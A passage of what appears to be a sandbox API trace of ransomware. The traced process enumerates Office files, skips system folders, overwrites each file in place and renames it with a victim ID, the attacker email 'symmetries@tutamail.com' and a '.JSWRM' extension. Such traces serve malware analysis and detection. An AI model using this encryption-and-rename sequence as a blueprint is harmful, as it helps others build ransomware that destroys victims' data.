(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0121.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0121.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0121.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0121.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0121.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.304] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0121.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0121.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0121.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0121.305] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e5f0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINE.HXS", cAlternateFileName="SKYPEF~3.HXS")) returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2=".") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="..") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="...") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="windows") returned -1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="recovery") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="perflogs") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="documents and settings") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="$RECYCLE.BIN") returned 1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="system volume information") returned -1 [0121.305] lstrcmpiW (lpString1="SKYPEFB_ONLINE.HXS", lpString2="msocache") returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE.HXS", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE.HXS", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE.HXS", lpUsedDefaultChar=0x0) returned 18 [0121.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE.HXS", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE.HXS", cchWideChar=18, lpMultiByteStr=0x240f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE.HXS", lpUsedDefaultChar=0x0) returned 18 [0121.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0121.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0121.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.306] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=124400) returned 1 [0121.307] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e5f0) returned 0x24e1d8 [0121.307] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1e5f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1e5f0, lpOverlapped=0x0) returned 1 [0121.317] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.317] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1e5f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1e5f0, lpOverlapped=0x0) returned 1 [0121.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.318] CloseHandle (hObject=0x238) returned 1 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0121.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0121.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0121.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0121.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0121.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.320] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f484, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINEG.HXS", cAlternateFileName="SKYPEF~2.HXS")) returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2=".") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="..") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="...") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="windows") returned -1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="recovery") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="perflogs") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="documents and settings") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="$RECYCLE.BIN") returned 1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="system volume information") returned -1 [0121.320] lstrcmpiW (lpString1="SKYPEFB_ONLINEG.HXS", lpString2="msocache") returned 1 [0121.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0121.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG.HXS", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0121.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0121.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG.HXS", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG.HXS", lpUsedDefaultChar=0x0) returned 19 [0121.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0121.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG.HXS", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0121.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0121.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG.HXS", cchWideChar=19, lpMultiByteStr=0x2413d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG.HXS", lpUsedDefaultChar=0x0) returned 19 [0121.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0121.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0121.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.321] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=128132) returned 1 [0121.321] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f480) returned 0x24e1d8 [0121.322] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1f480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1f480, lpOverlapped=0x0) returned 1 [0121.371] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.371] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1f480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1f480, lpOverlapped=0x0) returned 1 [0121.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.372] CloseHandle (hObject=0x238) returned 1 [0121.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0121.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0121.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0121.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0121.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0121.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0121.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0121.375] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29f, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINEG_COL.HXC", cAlternateFileName="SKYPEF~3.HXC")) returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2=".") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="..") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="...") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="windows") returned -1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="recovery") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="perflogs") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="documents and settings") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="system volume information") returned -1 [0121.375] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXC", lpString2="msocache") returned 1 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXC", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXC", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_COL.HXC", lpUsedDefaultChar=0x0) returned 23 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXC", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXC", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_COL.HXC", lpUsedDefaultChar=0x0) returned 23 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0121.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.376] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=671) returned 1 [0121.376] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x290) returned 0x20b1f8 [0121.377] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x290, lpOverlapped=0x0) returned 1 [0121.378] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.378] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x290, lpOverlapped=0x0) returned 1 [0121.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0121.378] CloseHandle (hObject=0x238) returned 1 [0121.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 